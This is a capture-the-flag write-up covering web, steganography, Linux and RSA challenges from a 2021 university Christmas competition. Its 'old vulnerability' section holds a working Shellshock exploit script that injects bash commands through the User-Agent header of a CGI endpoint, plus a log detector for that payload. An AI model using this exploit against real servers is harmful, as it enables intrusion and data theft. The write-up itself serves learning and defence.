
This CTF is one of the CTFs that I had fun playing. It had multiple categories and was in Jeopardy style.

WEB


Mr RoboT

This was the first challenge, with the description "Hello Mr Robot". I directly knew that they wanted us to check the robots.txt file!

And we have the flag. That was a quick one :) and a fun one!

FLAG : UDOM{d0nt_forg3t_Me_mr_ROBOT}

pPOSTMANm

The next one was named pPOSTMANm, with a description saying "celebrate xmas with postman", so what I do now is copy the link to access the challenge and try to see what I get from visiting it:

Nothing at all. I now try to send a POST request to the same link and see what I get:

Yep the FLAG

FLAG : UDOM{xmas_with_POSTMAN}

Language

With a description saying "Speak a native language!!!", this totally scared me to hell lol. What's my native language? Then I understood what they meant: it had something to do with the Accept-Language header. I have to change it to my country's locale and I'll get the flag!

I sent a request with curl with the Accept-Language header set to the value sw-TZ:

┌─[tahaafarooq@cyberwarriors]─[~]
└──╼ $curl 'http://193.122.147.103:9001/' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://193.122.147.103/' \
  -H 'Accept-Language: sw-TZ' \
  -H 'Cookie: session=8425aad4-0788-42d2-a409-7d780f9fc191.69oMcvm-l0VaAcHr3KgltFHdhgk' \
  -H 'dnt: 1' \
  -H 'sec-gpc: 1' \
  --compressed \
  --insecure

FLAG : UDOM{xmas_c3l3br3t3_in_swahili}

inspectorHTML

Well, this one was a classic. The description was "see if you can click me" and I said why not hehehe! Let's click this web chall!

Okay, I wasn't able to click that red button, so what I did now was inspect the element and see what it has that makes it un-clickable

Alright, we have that disable attribute, let's remove it and we will surely have the flag

FLAG : UDOM{CL1CK_CL1CK_B00M}

BAD DEVELOPER

With the description saying "can you find the mistake!! and login to get flag", why not? I love finding mistakes and bugs, and having to login is the best part LOL, so let's open the web app

And we have a login page. Let's have a look at the source code, perhaps we might get something. And yes, I did try SQLi, it didn't work!

Okay, we have the password now. Let's try to login with the password and a different username:

And we get an error saying that cyrange is the one that uses that password to login to the dashboard, so yes, that's the mistake: it's disclosing information! LOL, now let's go get the flag!

FLAG : UDOM{S0m3_M1STAK3_MAD3_DEVELOP3R}

Black and White

This was a fairly easy one with 500 points, with the description saying "lets Turn thing Different Now !! come on Big Man", and I knew that they were trynna mock me LOL, coz I am the big man

YESSIRRRRRRRRR!

Aight, now let's quit playing hahaha. So I visit the web page and I'm like WTH is this

A black and white page. Well, I decide to check the source code

Alright, something interesting: an image that's linked in the attribute with a base64-encoded data type, so let's open this image in a new tab

I now need some milk, it was that easy and had 500 points

FLAG : UDOM{svg-thingcolor}

old vulnerability

Given the description

threatening billions of machines all over the world. like LOG4J LOL!!

i bet flag will be near the developer Center!!

This should be a tricky one, given a hint in robots.txt, so I followed up and used FFUF to grab the filename:

┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/old_vuln]
└──╼ $curl http://193.122.147.103:9005/robots.txt
disallowed /xxx-xxx/sh****.sh
disallowed /xxx-xxx/sh****.cgi

We already know that it's cgi-bin, with the command: ffuf -w rockyou.txt -u http://193.122.147.103:9005/cgi-bin/FUZZ.sh

Found it! shelly.sh && shelly.cgi

This is well exploitable but with the help of a quick simple script from my buddy codaholi I was able to finish the job quick!

#!/usr/bin/python3
# @author : codaholikid
import requests

url = "http://193.122.147.103:9005/cgi-bin/shelly.sh"

while 1:
    command = input("$ ")
    # the command rides in the User-Agent header, after a bash function definition
    header = {"User-Agent": "() { :;};echo; /bin/bash -c '%s'" % command}
    r = requests.post(url, headers=header)
    print(r.text.strip())

Now I run the script:

└──╼ $python3 shellshock.py 
$ find / -name "*.txt"

And it gave me a list of files, but from it I was able to get the file I need

So now let's read our flag:

$ cat /var/www/flagxxx.txt
UDOM{shell_shock_oldtime}

FLAG : UDOM{shell_shock_oldtime}
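
Seen from the server side, the request the script above sends stands out: the User-Agent value begins with a bash function definition. The following is an added example, not part of the original write-up, that scans combined-format access log lines for header values starting that way; the log lines are constructed samples and the function names are made up for this illustration.

```python
import re

# A Shellshock payload is a header value that starts with a bash function
# definition; the pattern tolerates spacing variants such as "(){" and "( ) {".
FUNC_DEF_RE = re.compile(r"^\s*\(\s*\)\s*\{")

# Combined log format: ip ident user [time] "request" status size "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample log lines (documentation IP ranges), not from the CTF server.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Dec/2021:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [26/Dec/2021:10:00:05 +0000] "POST /cgi-bin/shelly.sh HTTP/1.1" 200 31 "-" "() { :;};echo; /bin/bash -c 'id'"
198.51.100.7 - - [26/Dec/2021:10:00:09 +0000] "GET /cgi-bin/shelly.cgi HTTP/1.1" 200 0 "(){ :; }; echo" "curl/7.74.0"
192.0.2.44 - - [26/Dec/2021:10:01:12 +0000] "GET /app.js?cb=function(){} HTTP/1.1" 200 912 "-" "Mozilla/5.0"
"""


def find_shellshock(lines):
    """Return (line number, client ip, header name) for each suspicious header."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED_RE.match(line.strip())
        if m is None:
            continue  # not combined format; a real tool would count these
        # Only the logged headers are checked: the CGI server copies them into
        # environment variables, which is where a vulnerable bash parses them.
        for header in ("referer", "agent"):
            if FUNC_DEF_RE.search(m.group(header)):
                hits.append((lineno, m.group("ip"), header))
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG.splitlines()):
        print("line %d: %s sent a function definition in %s" % hit)
```

The fourth sample line shows why the pattern is anchored to the start of a header value: `function(){}` in a query string is ordinary JavaScript and is not reported.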

I'll skip the ENCODE category because all of them were pretty straightforward and easy, so I'll jump to MISC


MISC

SpellBack

Starting with this challenge named spellback, we are given a string }LLEWLLEPS_nac_uoy{MODU :

┌─[tahaafarooq@cyberwarriors]─[~]
└──╼ $echo "}LLEWLLEPS_nac_uoy{MODU" | rev
UDOM{you_can_SPELLWELL}

FLAG : UDOM{you_can_SPELLWELL}

Joe's Son

This is a fun one, and a challenging one as well. We are given 57ie9eb182943223bo0b4ej7f17c5e4cb6e and we have to crack it to get the password and then embed the password in the UDOM{password} format. I first try to identify the hash and then I realize that the hash is actually corrupted, or sort of

Well, basically it should be MD5, so what I did was take an md5sum of a random file, check the length of it, and compare them

>>> hash_a = "a26d7a28043ee37784df3f961bb10d14"
>>> hash_b = "57ie9eb182943223bo0b4ej7f17c5e4cb6e"
>>> len(a)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'a' is not defined
>>> len(hash_a)
32
>>> len(hash_b)
35

Okay, I now realize I have 3 characters that aren't supposed to be there, and basically in an MD5 hash algorithm we don't have some letters such as o, j, and i. Let's remove those and then crack the hash!

So now it identifies the hash as MD2,4,5 : 57e9eb182943223b0b4e7f17c5e4cb6e. I'll use an online hash cracker, crackstation

And I got the password

FLAG : UDOM{MerryChristmas}

qwert

This was quite a challenge. The description gave an image which had nothing and a text GERM?Ekrpat{T3FXRAPE+ , so since it's written qwert I decided to try out a keyboard change and converted the text from the Dvorak layout to Qwerty

FLAG : UDOM{Dvorak_K3YBOARD}
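
The layout conversion can be done offline by pairing each Dvorak key with the QWERTY key at the same physical position. This is an added example, not the tool used in the original write-up; the function names and the `recover` helper are made up for this illustration, and it assumes the standard US variants of both layouts.

```python
# Printable keys of a US keyboard in the same physical order for both layouts:
# number row, top row, home row, bottom row, then the same four rows shifted.
QWERTY = (
    "`1234567890-=" "qwertyuiop[]\\" "asdfghjkl;'" "zxcvbnm,./"
    "~!@#$%^&*()_+" "QWERTYUIOP{}|" 'ASDFGHJKL:"' "ZXCVBNM<>?"
)
DVORAK = (
    "`1234567890[]" "',.pyfgcrl/=\\" "aoeuidhtns-" ";qjkxbmwvz"
    "~!@#$%^&*(){}" '"<>PYFGCRL?+|' "AOEUIDHTNS_" ":QJKXBMWVZ"
)
# Both tables must list the same 94 characters, otherwise a key is mistyped.
if len(QWERTY) != 94 or sorted(QWERTY) != sorted(DVORAK):
    raise ValueError("layout tables must be permutations of the same 94 keys")

DVORAK_TO_QWERTY = str.maketrans(DVORAK, QWERTY)
QWERTY_TO_DVORAK = str.maketrans(QWERTY, DVORAK)


def dvorak_to_qwerty(text):
    """Replace each Dvorak character with the QWERTY character on the same key."""
    return text.translate(DVORAK_TO_QWERTY)


def qwerty_to_dvorak(text):
    """Inverse mapping, for text typed the other way round."""
    return text.translate(QWERTY_TO_DVORAK)


def recover(text, marker="UDOM{"):
    """Try both directions and return (direction, plaintext) for the one that
    contains the flag marker, or None when neither does."""
    for name, convert in (("dvorak->qwerty", dvorak_to_qwerty),
                          ("qwerty->dvorak", qwerty_to_dvorak)):
        candidate = convert(text)
        if marker in candidate:
            return name, candidate
    return None


if __name__ == "__main__":
    print(recover("GERM?Ekrpat{T3FXRAPE+"))
```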

ENTENSION

Given a string H4sICAVIx2EAA2FyZmcAC3Xx9612j/IMiA8ONzYOqeUCALTGXewRAAAA that we have to get a flag from. Well, I'm not speaking gibberish, so I sent the string straight to CyberChef:

FLAG : UDOM{GZIP_SW33T}
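
The `H4sI` prefix is what gives this string away: it is how the gzip magic bytes `1f 8b 08` look after base64 encoding. The same decode can be done without CyberChef; this is an added example, not part of the original write-up, and the helper names are made up for this illustration.

```python
import base64
import gzip
import struct

BLOB = "H4sICAVIx2EAA2FyZmcAC3Xx9612j/IMiA8ONzYOqeUCALTGXewRAAAA"  # string from the challenge

FEXTRA, FNAME = 0x04, 0x08  # gzip header flag bits (RFC 1952)


def looks_like_gzip_b64(text):
    """The bytes 1f 8b 08 (gzip magic + deflate method) always encode to 'H4sI'."""
    return text.startswith("H4sI")


def gzip_header(raw):
    """Parse the fixed 10-byte gzip header and the optional original file name."""
    magic, method, flags, mtime, _xfl, os_id = struct.unpack("<HBBIBB", raw[:10])
    if magic != 0x8B1F or method != 8:
        raise ValueError("not a gzip/deflate stream")
    pos, name = 10, None
    if flags & FEXTRA:  # optional extra field comes first, length-prefixed
        (xlen,) = struct.unpack("<H", raw[pos:pos + 2])
        pos += 2 + xlen
    if flags & FNAME:   # then the NUL-terminated original file name
        end = raw.index(b"\x00", pos)
        name = raw[pos:end].decode("latin-1")
    return {"mtime": mtime, "os": os_id, "name": name}


def decode(text):
    """base64 -> gzip header metadata + decompressed payload (CRC is verified)."""
    raw = base64.b64decode(text, validate=True)
    return gzip_header(raw), gzip.decompress(raw)


if __name__ == "__main__":
    if looks_like_gzip_b64(BLOB):
        header, data = decode(BLOB)
        print(header)
        print(data.decode().strip())
```

Besides the flag, the header carries metadata that a blind "decode everything" recipe skips over: the original file name and the compression timestamp.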

suspect

This challenge only had two solvers, me and my bwoi codaholikid

Well, it was a fun one actually. So basically we are given an image

but I got nothing from it. I tried binwalking over it but still nothing, so then I decided to take the hash and go check it out on VirusTotal

┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/suspect]
└──╼ $md5sum suspect.png 
6985be92576b016da18ea0846818fdc4  suspect.png

FLAG : UDOM{TOTAL_virus}


STEG

Morxe

We have this challenge made by my bwoi blackninja. We are given a wav file which has some weird tones inside it, and the sounds from it tell me that it's Morse code, so I directly went to an online Morse code decoder

FLAG : WEW1SHM3RRYCHR1SMASSUDOMCYB3RCLUB

stegx

This one also had two solvers, me again and my bwoi @codaholikid. I solved it by guessing lol, but @codaholikid made a loop. I actually guessed a wordlist, since the description was "Not everything can be found in rock"

and we are given an image that has something embedded in it with steghide, so we have to crack the password with stegseek

So we got the password as x4ivygA51F, and the file is extracted as output.txt but its original name is flag.txt

┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/stegx/test]
└──╼ $cat output.txt 
UDOM{st3ganography_1n_jpg_w1th_n0t_rockyou}

FLAG : UDOM{st3ganography_1n_jpg_w1th_n0t_rockyou}

bytex

This was quite a fun one! We are given a file which doesn't have any format, and we have to get the flag. The description is "Can you see something inside something?? You see, take me out..."

Alright, so I first download the image:

┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/bytex/test]
└──╼ $file udom 
udom: data

So we find a bunch of NO FLAG NO FLAG, let's dig a bit deeper

We can see that there is a JFIF header covered over there, so let's use vim to remove the NO FLAGs and then use eog to view the image

Alright, we cleaned it! So let's view it now

FLAG : UDOM{N0w_Y0u_know_How_bytes_begin_and_end_t0o}
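
The vim cleanup can also be done programmatically by carving the JPEG out from its start marker to its end marker. This is an added example, not part of the original write-up; it assumes the filler sits before and after the image (the write-up does not show the exact layout) and that the image has a single scan, and the sample bytes are a constructed skeleton rather than the challenge file.

```python
import struct

SOI = b"\xff\xd8"  # start of image
EOI = b"\xff\xd9"  # end of image
SOS = 0xDA         # start of scan: compressed image data follows this segment


def carve_jpeg(blob):
    """Return (offset, jpeg_bytes) for the first JPEG found in blob, else None."""
    start = blob.find(SOI + b"\xff")
    if start < 0:
        return None
    pos = start + 2
    # Walk the length-prefixed header segments (APP0/JFIF, DQT, SOF, DHT, ...)
    # so that an ff d9 byte pair inside a header table is not mistaken for the end.
    while pos + 4 <= len(blob):
        if blob[pos] != 0xFF:
            return None  # no marker where one must be: not a real JPEG header
        marker = blob[pos + 1]
        (seg_len,) = struct.unpack(">H", blob[pos + 2:pos + 4])
        pos += 2 + seg_len
        if marker == SOS:
            break
    else:
        return None  # ran off the end without reaching the scan data
    # Inside scan data every ff is followed by 00 or a restart marker, so the
    # first ff d9 after the scan header ends the image (single-scan assumption).
    end = blob.find(EOI, pos)
    if end < 0:
        return None
    return start, blob[start:end + 2]


# Constructed sample: a structurally valid JPEG skeleton (not a viewable image)
# wrapped in the kind of filler text the challenge file contained.
JPEG_SKELETON = (
    SOI
    + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"  # APP0
    + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"                      # SOS header
    + b"\x12\x34\xff\x00\x56"                                          # scan data
    + EOI
)
SAMPLE = b"NO FLAG " * 4 + JPEG_SKELETON + b"NO FLAG " * 4

if __name__ == "__main__":
    offset, image = carve_jpeg(SAMPLE)
    print("JPEG at offset %d, %d bytes" % (offset, len(image)))
```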

Mr Whit3

This is another challenge solved only by me and my buddy @codaholikid. Uwiii, stuff is kinda challenging, hahaha. So basically, the description says "Can you see in the light?" and we are given a txt file. The first thing I do is try to read it, but as I do I come across something like whitespace. Then I realized yes, it is whitespace, but made with stegsnow, and it also has a password, so I have to crack it with a wordlist:

So I wrote a simple script that will help me do the job. Excuse my bad coding style :) but as long as it does the job then it is elite!

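#!/usr/bin/python3
# author : @tahaafarooq#9056
import subprocess

# try every candidate password from the wordlist against the stegsnow file
with open("merryword.txt", "r", errors="ignore") as wordlist:
    for line in wordlist:
        password = line.strip()
        # argument list (no shell), so a quote inside a password cannot break the command
        subprocess.run(["stegsnow", "-C", "-p", password, "merryXmasMrWhite.txt"])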

So I made a custom wordlist of mine with all the words with merry from rockyou.txt and named the wordlist merryword.txt

That worked, but the only problem is there are a lot of results, from every password in the wordlist, so now I'll grep the result

FLAG : UDOM{SN0wcracker_wellDON3}


LINUX

Bash_History

The description said "get me!!!", and then we are given a zip file

└──╼ $unzip bash_history.zip 
Archive:  bash_history.zip
   creating: Documents/
   creating: LAB/
   creating: flag/
 extracting: flag.txt                
  inflating: .bash_history           
  inflating: .bash_logout  

We unzip it and get some files, including .bash_history, which is interesting, and we also get flag.txt

They tricked us!! , SHISH!, But I found something interesting ..

└──╼ $echo "aHR0cHM6Ly9wYXN0ZWJpbi5jb20vZWVMM1ZOMUE="| base64 -d
https://pastebin.com/eeL3VN1A

I got a pastebin link

From the link I followed the mega link and downloaded an image, and from the image I was able to get the flag

FLAG : UDOM{its_called_OSINT}

ENCODED

I'll only write about 3 challenges in this category, namely: EASY RSA, MEDIUM RSA, and Ben Olmstead

EASY RSA

We are given a file named rsa.txt which has information about our p and q and n, and of course our ciphertext c and exponent, so now this should be easy:

p = 11116188838939060770257745148147358293555735818304945031904314986499619902861389131692960923447811615331917485192156658652749983632634958762152049925477127
q = 8487919438101303814483748529639602760583915398820568411450788370335198224694701358911154306675934195405262897926286524061449821386207216748726261969771421
e = 65537
c = 29084496881534296943051814218289640762156351681357178292873637784699231017881629945435160527516295265495090841005829367668930442743360493983807041342707012552879343826078826331308441763546747670052757146096657340929494256815236122799603923149019274821906527452186538703951939449064959876032924639999735327975

Because we are given everything and we don't have to find any factor of n or anything, we just have to create our N. I wrote a simple Python script that will do all the dual-prime RSA calculation and give us our plaintext back:

#!/usr/bin/python3
# author : @tahaafarooq
import os
from Crypto.Util.number import inverse

ct = int(input("Enter your cipher text : "))
p = int(input("Enter your P value : "))
q = int(input("Enter your Q value : "))
e = int(input("Enter your exponent : "))

n = p * q
phi = (p - 1) * (q - 1)
d = inverse(e, phi)  # private exponent
m = pow(ct, d, n)    # decrypted message as an integer

key = hex(m)[2:]     # hex digits without the "0x" prefix
if len(key) % 2:
    key = "0" + key  # xxd needs whole bytes
os.system("echo " + key + " | xxd -r -p")  # turn the hex back into text
print()

Make sure you have xxd installed. If you don't have it, you can install it with sudo apt-get install xxd on Debian and Ubuntu systems or pacman -S xxd on Arch-based systems

So now let's run our script


FLAG : UDOM{qu1ck_s1mp3l_rsa_13377}

MEDIUM RSA

This one was a multi-prime RSA challenge. We were given rsa.txt, which had the following:

n = 580642391898843192929563856870897799650883152718761762932292482252152591279871421569162037190419036435041797739880389529593674485555792234900969402019055601781662044515999210032698275981631376651117318677368742867687180140048715627160641771118040372573575479330830092989800730105573700557717146251860588802509310534792310748898504394966263819959963273509119791037525504422606634640173277598774814099540555569257179715908642917355365791447508751401889724095964924513196281345665480688029639999472649549163147599540142367575413885729653166517595719991872223011969856259344396899748662101941230745601719730556631637
e = 65537
c = 464457186798562586182945605278053614935005234268582950087247481567854082939744760719597884771991031499599824058099416837268890411135171222035332697924212275553908733959100620171336843228935380532463970519390921347781025380408554430005209285855809415548228888212194548360656641334620482684242066910205917692562465781291842336297509525407251255063982764680358893157730953032939994853850484274876323255910245449244667956201667990014757113955721280174240371101303627013686429165140647914539930245979797232335104668519729528139825892384600949788340931006992534788169303627187098449051502953626453569008623810102368469

So I took the n and used factordb to get the prime factors of n so that I could get the ps and qs

Okay, we have a bunch of ps and qs. I had quite some problems solving it, but I came across a script on GitHub, edited it a bit, and was able to get the flag after executing it:

#!/usr/bin/python3
# author : @tahaafarooq
import os
#from Crypto.Util.number import inverse

factors = [9282105380008121879, 9303850685953812323, 9389357739583927789, 10336650220878499841, 10638241655447339831, 11282698189561966721, 11328768673634243077, 11403460639036243901, 11473665579512371723, 11492065299277279799, 11530534813954192171, 11665347949879312361, 12132158321859677597, 12834461276877415051, 12955403765595949597, 12973972336777979701, 13099895578757581201, 13572286589428162097, 14100640260554622013, 14178869592193599187, 14278240802299816541, 14523070016044624039, 14963354250199553339, 15364597561881860737, 15669758663523555763, 15824122791679574573, 15998365463074268941, 16656402470578844539, 16898740504023346457, 17138336856793050757, 17174065872156629921, 17281246625998849649]
c = 464457186798562586182945605278053614935005234268582950087247481567854082939744760719597884771991031499599824058099416837268890411135171222035332697924212275553908733959100620171336843228935380532463970519390921347781025380408554430005209285855809415548228888212194548360656641334620482684242066910205917692562465781291842336297509525407251255063982764680358893157730953032939994853850484274876323255910245449244667956201667990014757113955721280174240371101303627013686429165140647914539930245979797232335104668519729528139825892384600949788340931006992534788169303627187098449051502953626453569008623810102368469
e = 65537
n = 580642391898843192929563856870897799650883152718761762932292482252152591279871421569162037190419036435041797739880389529593674485555792234900969402019055601781662044515999210032698275981631376651117318677368742867687180140048715627160641771118040372573575479330830092989800730105573700557717146251860588802509310534792310748898504394966263819959963273509119791037525504422606634640173277598774814099540555569257179715908642917355365791447508751401889724095964924513196281345665480688029639999472649549163147599540142367575413885729653166517595719991872223011969856259344396899748662101941230745601719730556631637

# extended Euclid: returns (g, x, y) with a*x + b*y == g
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception("modular inversion does not exist")
    else:
        return x % m

ts = []
xs = []
ds = []

# private exponent modulo each prime factor
for i in range(len(factors)):
    ds.append(modinv(e, factors[i]-1))

m = factors[0]

# inverse of the running product of earlier primes, modulo the next prime
for i in range(1, len(factors)):
    ts.append(modinv(m, factors[i]))
    m = m * factors[i]

# decrypt modulo each prime separately
for i in range(len(factors)):
    xs.append(pow(c%factors[i], ds[i], factors[i]))

x = xs[0]
m = factors[0]

# combine the per-prime results with the Chinese Remainder Theorem
for i in range(1, len(factors)):
    x = x + m * ((xs[i] - x % factors[i]) * (ts[i-1] % factors[i]))
    m = m * factors[i]

key = hex(x%n)[2:]   # hex digits without the "0x" prefix
if len(key) % 2:
    key = "0" + key  # xxd needs whole bytes
os.system("echo " + key + " | xxd -r -p")
print()

└──╼ $python3 mprsa_dec.py 
UDOM{Y0U_GO0T_1T_MANY_PRIM3S_133770

FLAG : UDOM{Y0U_GO0T_1T_MANY_PRIM3S_13377}

Ben Olmstead

It has a description saying "You cant win!!" but I guess I just knew what I was doing LOL. Alright, so we are given a file named weirdBase.txt

Alright, I was scared. I was like "WHAT IS THE NAME OF HELL IS THIS???" but then I googled the name of the challenge and came across something similar:

It's a programming language that I didn't know existed until I read about it. Now, what to do with the weird string? I took the string to dcode.fr and it gave me a ping back that it's ASCII85

And from there I decoded the string and I got this:

This was another weird string and now my mind is corrupting, I'm like hold up, what have I just done LOL. But I remembered the Malbolge programming language, googled a compiler for it, and I was able to get an online compiler and run it

And I have the flag finally!!

FLAG : UDOM{malbolge_encoder}


I actually solved all challenges with ma buddy codaholikid, and got #1st with my buddy codaholi leading #2nd

Congrats to Nicholaus , Munojr, szdiof, and mrAlienx

26 | 12 | 2021  | @tahaafarooq(twitter)